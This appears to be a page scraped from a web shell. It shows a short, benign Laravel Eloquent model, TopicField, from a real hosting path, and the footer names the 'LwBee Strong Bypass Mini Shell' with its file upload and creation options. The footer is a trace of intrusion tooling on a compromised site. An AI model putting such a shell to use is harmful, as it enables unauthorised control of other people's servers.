/home/u503560585/domains/mscm.me/public_html/app/Models/TopicField.php
<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;

class TopicField extends Model
{
    use HasFactory;

    public function field() {
        return $this->belongsTo(WebmasterSectionField::class);
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File